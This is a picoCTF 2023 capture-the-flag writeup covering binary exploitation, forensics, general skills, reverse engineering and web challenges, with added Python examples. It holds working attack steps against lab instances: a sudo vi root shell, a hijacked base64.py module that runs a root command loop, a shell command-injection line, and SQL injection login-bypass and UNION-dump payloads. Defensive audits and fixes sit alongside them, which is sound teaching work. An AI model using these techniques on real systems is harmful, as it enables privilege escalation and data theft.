---
# System prepended metadata

title: picoCTF 2023 Writeup
tags: [CTF, WriteUp]

---

#    picoCTF 2023 Writeup

##    Binary Exploitation

###    hijacking
    AUTHOR: THEONESTE BYAGUTANGAZA

    Description
    Getting root access can allow you to read the flag. Luckily there is a 
    python file that you might like to play with.
    Through Social engineering, we've got the credentials to use on the 
    server. SSH is running on the server.
    
####    Poking around
![](https://hackmd.io/_uploads/BkCIB9eLh.png)
The `/challenge` directory looks suspicious, but this user cannot `cd` into it.

![](https://hackmd.io/_uploads/BJpdBcgIn.png)

Checking the sudo rules (`sudo -l`) shows that the user may run `vi` with sudo.
![](https://hackmd.io/_uploads/Hy6NrclIn.png)


####    exploit
```shell=
sudo vi

:shell
```
![](https://hackmd.io/_uploads/rkEI89xI3.png)
That is privilege escalation done: the `:shell` command drops into a root shell, so just go into `/challenge/` and grab the flag. (Any editor that can spawn a subshell, `:shell` or `:!sh` in vi, is a full root shell when it runs under sudo, which is why sudo rules should never grant editors.)

![](https://hackmd.io/_uploads/rkETIce8h.png)

>picoCTF{pYth0nn_libraryH!j@CK!n9_5a7b5866}

####    Original solution
    When I first solved this, I tampered with the `base64` module that `.server.py` imports.
    For some reason, while writing this writeup I could no longer run `.server.py` as root.

`ls -al` first reveals a hidden `.server.py`


`cat .server.py`
```python=
import base64
import os
import socket
ip = 'picoctf.org'
response = os.system("ping -c 1 " + ip)
#saving ping details to a variable
host_info = socket.gethostbyaddr(ip)
#getting IP from a domaine
host_info_to_str = str(host_info[2])
host_info = base64.b64encode(host_info_to_str.encode('ascii'))
print("Hello, this is a part of information gathering",'Host: ', host_info)
```

`vim .server.py` cannot change `.server.py`, because it is read-only for us, but the same restriction was not applied to `base64.py`, the library the script imports.

**Tamper with the imported module**
`vim /usr/lib/python3.8/base64.py`
```python=
import os

# Runs as soon as .server.py imports base64; under sudo that is root.
# Minimal command loop: read a line, run it, print its output.
while 1:
    cmd = input()
    print(os.popen(cmd).read())
```

**Get a shell**
```shell=
sudo python3 .server.py
```
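The underlying problem is that a script run as root resolves its imports by name along `sys.path`, so any module file on that path that a low-privileged user can write executes with root's privileges. As an added example (not part of the original writeup or the challenge), the following script audits which modules a given script imports and reports the ones whose resolved file is writable by group or others. The fixture directory, its stand-in `base64.py` / `socket.py` files and the three-line script text are constructed for the demo; on a real box you would pass the contents of `.server.py` and the entries of `sys.path`.

```python
from __future__ import annotations

import ast
import os
import stat
import tempfile
from pathlib import Path


def imported_module_names(source: str) -> list[str]:
    """Top-level module names a script imports (both `import x` and `from x import y`)."""
    names = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.extend(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.append(node.module.split(".")[0])
    return sorted(set(names))


def resolve_module(name: str, search_path: list[Path]) -> Path | None:
    """First <name>.py or <name>/__init__.py on the search path, in sys.path order."""
    for directory in search_path:
        for candidate in (directory / f"{name}.py", directory / name / "__init__.py"):
            if candidate.is_file():
                return candidate
    return None  # built-in module, or not on this search path


def writable_by_others(path: Path) -> bool:
    """Check the mode bits rather than os.access(): the question is what *other* users can write."""
    mode = path.stat().st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_imports(source: str, search_path: list[Path]) -> dict[str, str]:
    """Map module name -> file path for every imported module that group/others can write."""
    findings = {}
    for name in imported_module_names(source):
        target = resolve_module(name, search_path)
        if target is not None and writable_by_others(target):
            findings[name] = str(target)
    return findings


def demo() -> list[str]:
    """Constructed fixture: a fake library dir where base64.py is world-writable and socket.py is not."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp) / "lib"
        lib.mkdir()
        (lib / "base64.py").write_text("# stand-in for the real module\n")
        (lib / "socket.py").write_text("# stand-in, correctly permissioned\n")
        os.chmod(lib / "base64.py", 0o666)  # the misconfiguration from the challenge
        os.chmod(lib / "socket.py", 0o644)
        script = "import base64\nimport os\nimport socket\n"  # mirrors .server.py's imports
        return sorted(audit_imports(script, [lib]))


if __name__ == "__main__":
    print(demo())
```

Against the real target the call would be `audit_imports(Path("/home/picoctf/.server.py").read_text(), [Path(p) for p in sys.path if p])`; anything it reports is a root-code-execution primitive for whoever holds the write bit.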

##    Forensics

###    hideme
    AUTHOR: GEOFFREY NJOGU

    Description
    Every file gets a flag.
    The SOC analyst saw one image been sent back and forth between two
    people. They decided to investigate and found out that there was more
    than what meets the eye here.

The download is an image, and it looks perfectly normal.

`exiftool` shows no flag hidden in any metadata field.

Try `strings flag.png`
![](https://hackmd.io/_uploads/BkC8pqxIn.png)
It contains something that looks like a file path, which is a strong hint that an archive is appended after the image data.

Treat `flag.png` as a zip and unzip it directly (`unzip` warns about extra bytes at the beginning of the file, then extracts anyway)
```shell=
unzip flag.png
```
That yields the image containing the flag
![](https://hackmd.io/_uploads/r1xCia5lI2.png)

>picoCTF{Hiddinng_An_imag3_within_@n_ima9e_92076717}
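What `unzip` does here is skip the PNG bytes and start at the first ZIP local-file header it finds. As an added example (not part of the original writeup), the following Python does the same thing explicitly: it walks the PNG chunk list to the `IEND` chunk, searches the trailing bytes for the `PK\x03\x04` signature and lists the embedded archive. The 1x1 carrier PNG, the archive and the member name `secret/flag_part.png` are all constructed in memory for the demo.

```python
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_cover_png() -> bytes:
    """Constructed 1x1 RGB PNG used as the carrier image."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8 bit, truecolour
    idat = zlib.compress(b"\x00\xff\x00\x00")           # filter byte + one red pixel
    return PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b"")


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past the IEND chunk's CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # header + data + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk found")


def find_embedded_zip(data: bytes):
    """Return (offset, member names, member contents) for a ZIP appended after the image, or None."""
    start = png_end_offset(data)
    off = data.find(ZIP_LOCAL_HEADER, start)  # only search the trailing bytes
    if off < 0:
        return None
    # Central-directory offsets are relative to the archive start, so slice from the header.
    with zipfile.ZipFile(io.BytesIO(data[off:])) as zf:
        names = zf.namelist()
        return off, names, {n: zf.read(n) for n in names}


def demo() -> dict:
    """Build carrier + appended archive in memory and recover the archive."""
    payload = io.BytesIO()
    with zipfile.ZipFile(payload, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("secret/flag_part.png", b"constructed payload bytes")
    blob = build_cover_png() + payload.getvalue()
    off, names, members = find_embedded_zip(blob)
    return {"png_end": png_end_offset(blob), "zip_offset": off, "names": names, "members": members}


if __name__ == "__main__":
    print(demo())
```

Comparing `png_end` with the file size is the quick triage check: a PNG whose `IEND` chunk is not the last thing in the file is carrying something.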

###    FindAndOpen
    AUTHOR: MUBARAK MIKAIL

    Description
    Someone might have hidden the password in the trace file.
    Find the key to unlock this file. This tracefile might be good to analyze.

This challenge provides two files, `flag.zip` and `dump.pcap`.
Trying to extract `flag.zip` shows that it needs a password.

####    Start with `dump.pcap`

Open `dump.pcap` in Wireshark

![](https://hackmd.io/_uploads/r11qn2eL2.png)
Clicking through a few packets shows that the payloads are all plaintext

![](https://hackmd.io/_uploads/SyH7T2lUh.png)
One packet stands out: it ends in `=`, very likely base64 padding (padding only appears when the input length is not a multiple of 3, so its absence would not have ruled base64 out).

Decoding it gives the first half of the flag
>This is the secret: picoCTF{R34DING_LOKd_

Back to `flag.zip`: on a hunch, try that first half of the flag as the password, and it works
>picoCTF{R34DING_LOKd_fil56_succ3ss_5ed3a878}
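Scrolling through packets works for a small capture; for anything larger you want the search automated. As an added example (not part of the original writeup), the following Python reads a classic libpcap file without any third-party library, scans each packet for base64-looking runs and keeps the ones that decode to printable text. The capture it runs on is constructed in memory: two packets with 42 zero bytes standing in for the Ethernet/IP/TCP headers, one of them carrying a made-up base64 secret.

```python
import base64
import binascii
import re
import struct

# A run of at least 16 base64 alphabet characters, optionally padded.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def iter_pcap_packets(data: bytes):
    """Yield raw packet bytes from a classic pcap (magic 0xa1b2c3d4, either byte order)."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    pos = 24  # skip the global header
    while pos + 16 <= len(data):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[pos:pos + 16])
        pos += 16
        yield data[pos:pos + incl_len]
        pos += incl_len


def base64_strings_in(payload: bytes, min_printable: float = 0.9) -> list[str]:
    """Decode every base64-looking run and keep those that decode to (mostly) printable text."""
    found = []
    for match in B64_RUN.finditer(payload):
        run = match.group(0)
        try:
            decoded = base64.b64decode(run, validate=True)
        except binascii.Error:
            continue  # wrong length or bad padding: not a real base64 blob
        if not decoded:
            continue
        printable = sum(32 <= b < 127 for b in decoded) / len(decoded)
        if printable >= min_printable:  # filters long ordinary words that happen to match
            found.append(decoded.decode("ascii", "replace"))
    return found


def find_secrets(pcap: bytes) -> list[tuple[int, str]]:
    """(packet index, decoded text) for every base64 string in the capture."""
    hits = []
    for idx, pkt in enumerate(iter_pcap_packets(pcap)):
        for text in base64_strings_in(pkt):
            hits.append((idx, text))
    return hits


def build_sample_pcap() -> bytes:
    """Constructed capture: two packets, the second carrying a base64-encoded secret."""
    secret = base64.b64encode(b"This is the secret: picoCTF{constructed_part_")  # made up
    packets = [
        b"\x00" * 42 + b"hello, plain text chatter\r\n",
        b"\x00" * 42 + b"HTTP/1.1 200 OK\r\n\r\n" + secret + b"\r\n",
    ]
    # Global header: magic, version 2.4, thiszone, sigfigs, snaplen, linktype (Ethernet)
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, pkt in enumerate(packets):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(pkt), len(pkt)) + pkt
    return out


if __name__ == "__main__":
    for idx, text in find_secrets(build_sample_pcap()):
        print(f"packet {idx}: {text}")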

##    General Skills
###    money-ware
    AUTHOR: JUNI19

    Description
    Flag format: picoCTF{Malwarename}
    The first letter of the malware name should be capitalized and the rest 
    lowercase.
    Your friend just got hacked and has been asked to pay some bitcoins to 
    1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is 
    going on and asks you for advice. Can you identify what malware he’s 
    being a victim of?

Google `1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX`

It turns up [a CNBC article](https://www.cnbc.com/2017/06/28/ransomware-cyberattack-petya-bitcoin-payment.html) on the June 2017 ransomware outbreak, reported at the time as Petya (the same wallet is the one quoted in the ransom notes of what is now usually called NotPetya; the flag format wants the name as reported).
![](https://hackmd.io/_uploads/SkJ-yplUn.png)

>picoCTF{Petya}

Trivial.

###    repetitions
    AUTHOR: THEONESTE BYAGUTANGAZA

    Description
    Can you make sense of this file?
    Download the file here.
Download `enc_flag`

```=
VmpGU1EyRXlUWGxTYmxKVVYwZFNWbGxyV21GV1JteDBUbFpPYWxKdFVsaFpWVlUxWVZaS1ZWWnVh
RmRXZWtab1dWWmtSMk5yTlZWWApiVVpUVm10d1VWZFdVa2RpYlZaWFZtNVdVZ3BpU0VKeldWUkNk
MlZXVlhoWGJYQk9VbFJXU0ZkcVRuTldaM0JZVWpGS2VWWkdaSGRXCk1sWnpWV3hhVm1KRk5XOVVW
VkpEVGxaYVdFMVhSbFZhTTBKWVZGWmFXbVZzV2tkWk0yaFRDbUpXV25sVVZtaFRWMGRHZEdWRlZs
aGkKYlRrelZERldUMkpzUWxWTlJYTkxDZz09Cg==
```
The trailing `==` is classic base64 padding.

After decoding:
```=
VjFSQ2EyTXlSblJUV0dSVllrWmFWRmx0TlZOalJtUlhZVVU1YVZKVVZuaFdWekZoWVZkR2NrNVVX
bUZTVmtwUVdWUkdibVZXVm5WUgpiSEJzWVRCd2VWVXhXbXBOUlRWSFdqTnNWZ3BYUjFKeVZGZHdW
MlZzVWxaVmJFNW9UVVJDTlZaWE1XRlVaM0JYVFZaWmVsWkdZM2hTCmJWWnlUVmhTV0dGdGVFVlhi
bTkzVDFWT2JsQlVNRXNLCg==
```

Decode again:
```=
V1RCa2MyRnRTWGRVYkZaVFltNVNjRmRXYUU5aVJUVnhWVzFhYVdGck5UWmFSVkpQWVRGbmVWVnVR
bHBsYTBweVUxWmpNRTVHWjNsVgpXR1JyVFdwV2VsUlZVbE5oTURCNVZXMWFUZ3BXTVZZelZGY3hS
bVZyTVhSWGFteEVXbm93T1VOblBUMEsK
```

And again:
```=
WTBkc2FtSXdUbFZTYm5ScFdWaE9iRTVxVW1aaWFrNTZaRVJPYTFneVVuQlpla0pyU1ZjME5GZ3lV
WGRrTWpWelRVUlNhMDB5VW1aTgpWMVYzVFcxRmVrMXRXamxEWnowOUNnPT0K
```
Still base64, decode again:

```=
Y0dsamIwTlVSbnRpWVhObE5qUmZiak56ZEROa1gyUnBZekJrSVc0NFgyUXdkMjVzTURSa00yUmZN
V1V3TW1Fek1tWjlDZz09Cg==
```

Keep going:
```=
cGljb0NURntiYXNlNjRfbjNzdDNkX2RpYzBkIW44X2Qwd25sMDRkM2RfMWUwMmEzMmZ9Cg==
```
One last layer:
```=
picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}
```
![](https://media.tenor.com/eipo4TRTSKwAAAAd/moe-simpsons-barney-e-moe.gif)

>picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}
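Six layers by hand is fine once; the same procedure as a loop needs two things the manual run glosses over: the newlines that the `base64` tool inserts every 76 columns (and that `b64decode(validate=True)` rejects) must be stripped first, and the loop needs a stopping rule that does not decode one layer too far when the innermost text happens to be made only of base64 characters. As an added example (not part of the original writeup), the following Python peels nested base64 with both of those handled; the nested input is constructed by the `nest` helper, and the inner string is made up for the test.

```python
import base64
import binascii
import re
import string

B64_ALPHABET = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable.encode())


def strip_ws(blob: bytes) -> bytes:
    """Drop the newlines the base64 tool inserts every 76 columns (and at the end)."""
    return b"".join(blob.split())


def looks_like_base64(blob: bytes) -> bool:
    s = strip_ws(blob)
    return len(s) % 4 == 0 and B64_ALPHABET.match(s) is not None


def peel_base64(blob: bytes, max_layers: int = 32) -> tuple[bytes, int]:
    """Decode layer by layer until the data stops looking like base64 or stops being text.

    Returns (innermost bytes, number of layers removed).
    """
    current, layers = blob, 0
    while layers < max_layers and looks_like_base64(current):
        try:
            decoded = base64.b64decode(strip_ws(current), validate=True)
        except binascii.Error:
            break
        # A layer that decodes to binary garbage means we went one step too far:
        # keep the previous, textual, layer instead of the garbage.
        if not decoded or any(b not in PRINTABLE for b in decoded):
            break
        current, layers = decoded, layers + 1
    return current, layers


def nest(plaintext: bytes, layers: int) -> bytes:
    """Constructed input: wrap plaintext in N layers of 76-column base64, like the enc_flag file."""
    out = plaintext
    for _ in range(layers):
        out = base64.encodebytes(out)
    return out


if __name__ == "__main__":
    inner, depth = peel_base64(nest(b"picoCTF{constructed_flag_for_the_test}\n", 6))
    print(depth, inner.decode())
```

The `max_layers` cap is there for adversarial input: a blob crafted to decode to itself would otherwise loop forever.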

###    Permissions
    AUTHOR: GEOFFREY NJOGU

    Description
    Can you read files in the root file?
    The system admin has provisioned an account for you on the main server:
    ssh -p 53849 picoplayer@saturn.picoctf.net
    Password: x+T6aPgE4-
    Can you login and read the root file?    
    
![](https://hackmd.io/_uploads/B1xxDTeI2.png)

>picoCTF{uS1ng_v1m_3dit0r_f6ad392b}

Trivial.

###    chrono
    AUTHOR: MUBARAK MIKAIL

    Description
    How to automate tasks to run at intervals on linux servers?
    Use ssh to connect to this server:
    Server: saturn.picoctf.net
    Port: 50602
    Username: picoplayer 
    Password: tPmsUpiHeZ

![](https://hackmd.io/_uploads/ByLMuagIn.png)

>picoCTF{Sch3DUL7NG_T45K3_L1NUX_0bb95b71}


###    useless
    AUTHOR: LOIC SHEMA

    Description
    There's an interesting script in the user's home directory
    Additional details will be available after launching your challenge instance.

![](https://hackmd.io/_uploads/HkhIYaeIn.png)

>picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_6173}

###    Special
    AUTHOR: LT 'SYREAL' JONES

    Description
    Don't power users get tired of making spelling mistakes in the shell? Not
    anymore! Enter Special, the Spell Checked Interface for Affecting Linux.
    Now, every word is properly spelled and capitalized... automatically and 
    behind-the-scenes! Be the first to test Special in beta, and feel free to
    tell us all about how Special streamlines every development process that
    you face. When your co-workers see your amazing shell interface, just
    tell them: That's Special (TM)
    Start your instance to see connection details.
    Additional details will be available after launching your challenge
    instance.
This shell keeps rewriting whatever you type into a plain dictionary word and capitalises the first letter.
`ls` becomes `Is`
`cat` becomes `Cat`; but only the first word is capitalised, so a `cat` that is not the first word survives intact.
That makes it a plain command injection: chain a second command with `;`, and the spell checker mangles only the first one
```shell=
cat;cat *
```
![](https://hackmd.io/_uploads/SJMKTpxLh.png)
There is a directory `blargh` in the current directory


```shell=
cat;cat blargh/*
```
![](https://hackmd.io/_uploads/SyasaagIn.png)

>picoCTF{5p311ch3ck_15_7h3_w0r57_f578af59}
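The bug here is the classic one: the wrapper normalises the first word and then hands the whole line to a shell, so `;` still separates commands and `*` still globs. As an added example (not part of the original writeup or the challenge's actual wrapper), the following Python models that wrapper beside a hardened version. The rewrite rule is simplified to "capitalise the first word" (an assumption about the challenge's spell checker, which did more than that), and the `ALLOWED` set is made up; `run_via_shell` really does spawn `sh`, so run it on a POSIX system.

```python
import shlex
import subprocess

ALLOWED = {"ls", "cat", "echo", "pwd"}  # assumption: the commands the wrapper is meant to expose


def special_rewrite(line: str) -> str:
    """Model of the challenge's 'spell checker': only the first word is normalised
    (capitalised here); everything after it is passed through untouched."""
    words = line.split(" ", 1)
    words[0] = words[0].capitalize()
    return " ".join(words)


def run_via_shell(line: str) -> str:
    """Vulnerable: the rewritten line is handed to /bin/sh, so `;` starts a second command
    and the mangled first word only produces a 'not found' error on stderr."""
    proc = subprocess.run(["sh", "-c", special_rewrite(line)], capture_output=True, text=True)
    return proc.stdout.strip()


def run_hardened(line: str) -> str:
    """Safer: tokenise with shlex, check the command against an allowlist, exec without a shell.
    `;` and `*` are now ordinary argument bytes, not syntax, and `cat;cat` is not a command."""
    argv = shlex.split(line)
    if not argv or argv[0] not in ALLOWED:
        return f"rejected: {argv[0] if argv else '<empty>'}"
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout.strip()


if __name__ == "__main__":
    payload = "echo;echo injected"  # same shape as `cat;cat *` from the challenge
    print("shell    :", run_via_shell(payload))
    print("hardened :", run_hardened(payload))
    print("hardened :", run_hardened("echo hi"))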

##    Reverse Engineering
###    Reverse
    AUTHOR: MUBARAK MIKAIL

    Description
    Try reversing this file? Can ya?
    I forgot the password to this file. Please find it for me?

The challenge provides a file `ret`; running it prompts for a password
![](https://hackmd.io/_uploads/H1IQkCgU2.png)


Load it in GDB
```shell=
start
c
# Ctrl-C to interrupt while the program is waiting for input
ni   # keep single-stepping until the password comparison
```
![](https://hackmd.io/_uploads/SJHUe0eL3.png)
When `strcmp` is called to compare the password, dump the string that `rsi` points to: it is the first part of the flag

>picoCTF{3lf_r3v3r5ing_succe55ful_9ae8528

Run `ret` again and enter that as the password
![](https://hackmd.io/_uploads/HJwZb0l83.png)

>picoCTF{3lf_r3v3r5ing_succe55ful_9ae85289}

##    Web Exploitation

###    More SQLi
    AUTHOR: MUBARAK MIKAIL

    Description
    Can you find the flag on this website.
    Additional details will be available after launching your challenge instance.
####    Bypass login    
Open the page: a classic login form
![](https://hackmd.io/_uploads/SkQs-CeL3.png)

```sql=
username=admin&
password=' or 'a'='a
```

![](https://hackmd.io/_uploads/HJnefAeU2.png)
The challenge helpfully prints the `query` it ran, which shows exactly where the input lands

Adjust the payload so the rest of the query is commented out
```sql=
username=123&
password=' or 1=1;--
```

After logging in there is a search page
![](https://hackmd.io/_uploads/SkTYRu-Uh.png)


####    Find the number of columns (a `UNION` only works when both sides select the same number)

```sql=
searchInput=' union select 1,2,3;--
```
![](https://hackmd.io/_uploads/ByxzS0uW83.png)


####    Dump the tables
```sql=
searchInput=' or 'a'='a
```
![](https://hackmd.io/_uploads/BJwUJt-Ln.png)
No `flag` here, so it is probably in another table; `sqlite_master` holds the schema of every table in an SQLite database

```sql=
' union select group_concat(sql),2,3 from sqlite_master WHERE type='table';--
```
![](https://hackmd.io/_uploads/SkJ-xt-83.png)

Now we know the flag should be in the `flag` column (declared `TEXT`) of `more_table`

```sql=
' union select flag,2,3 from more_table;--
```
![](https://hackmd.io/_uploads/B16UGtZ82.png)
>picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_3b0fca37}
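Every step above can be reproduced offline against SQLite, which is also the clearest way to see why the fix is parameterised queries rather than input filtering. As an added example (not part of the original writeup or the challenge's code), the following Python builds an in-memory database with constructed `users`, `offices` and `more_table` tables, reproduces the string-concatenated login and search queries, runs the same payloads (written with `--` alone; the `;` before it is optional), and shows the bound-parameter version of the login refusing the bypass. The table contents and the flag value are made up.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users (name TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 'not-the-real-one');          -- constructed
    CREATE TABLE offices (id INTEGER, city TEXT, address TEXT);
    INSERT INTO offices VALUES (1, 'London', '1 Example St'), (2, 'Paris', '2 Rue Exemple');
    CREATE TABLE more_table (flag TEXT);
    INSERT INTO more_table VALUES ('picoCTF{constructed_flag_for_this_example}');
""")


def login_vulnerable(username: str, password: str):
    """String-built query, as the challenge does; returns the matched row or None."""
    q = f"SELECT * FROM users WHERE name='{username}' AND password='{password}'"
    return db.execute(q).fetchone()


def login_safe(username: str, password: str):
    """Same query with bound parameters: the quote in the input is data, not syntax."""
    q = "SELECT * FROM users WHERE name=? AND password=?"
    return db.execute(q, (username, password)).fetchone()


def search_vulnerable(term: str):
    """The office search, also built by concatenation; returns every row the query yields."""
    q = f"SELECT * FROM offices WHERE city LIKE '%{term}%'"
    return db.execute(q).fetchall()


def first_column(rows):
    return [row[0] for row in rows]


def demo() -> dict:
    bypass = "' or 1=1--"
    count_probe = "' union select 1,2,3--"
    schema = "' union select group_concat(sql),2,3 from sqlite_master where type='table'--"
    flag = "' union select flag,2,3 from more_table--"
    return {
        "vuln_login": login_vulnerable("123", bypass) is not None,   # bypassed
        "safe_login": login_safe("123", bypass) is not None,         # not bypassed
        "columns_ok": (1, 2, 3) in search_vulnerable(count_probe),   # three columns confirmed
        "schema": first_column(search_vulnerable(schema)),           # CREATE statements leak
        "flag": first_column(search_vulnerable(flag)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")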


###    MatchTheRegex
    AUTHOR: SUNDAY JACOB NWANYIM

    Description
    How about trying to match a regular expression
    Additional details will be available after launching your challenge instance.
    

Without reading the hint, I had no idea what it wanted at first
![](https://hackmd.io/_uploads/rk36rFZ8h.png)

It turns out the input only has to match `^p.....F!?`: a `p`, any five characters, an `F`, and an optional `!` (there is no `$` anchor, so anything starting that way passes; `picoCTF` itself does)
![](https://hackmd.io/_uploads/SyhyLF-Uh.png)

![](https://hackmd.io/_uploads/S1jOSFbLn.png)
>picoCTF{succ3ssfully_matchtheregex_9080e406}

The easiest challenge of the year.


###    findme

    AUTHOR: GEOFFREY NJOGU

    Description
    Help us test the form by submiting the username as test and password as test!
    Additional details will be available after launching your challenge instance.
    
First log in with username `test` and password `test!`
![](https://hackmd.io/_uploads/S1Q0_t-U2.png)

After logging in, the page says *I was redirected here by a friend of mine but i couldnt find anything. Help me search for flags :-)*
![](https://hackmd.io/_uploads/SyiWKKbU3.png)

####    Inspect the intermediate redirect pages with `BurpSuite`

![](https://hackmd.io/_uploads/SkjKtK-L2.png)
The login response redirects through two pages, each with an `id` parameter that looks like classic base64; the browser follows the redirects too fast to see them, but the proxy history keeps both

![](https://hackmd.io/_uploads/ryteqKbUh.png)
![](https://hackmd.io/_uploads/HJZycFWLh.png)
>picoCTF{proxies_all_the_way_be716d8e}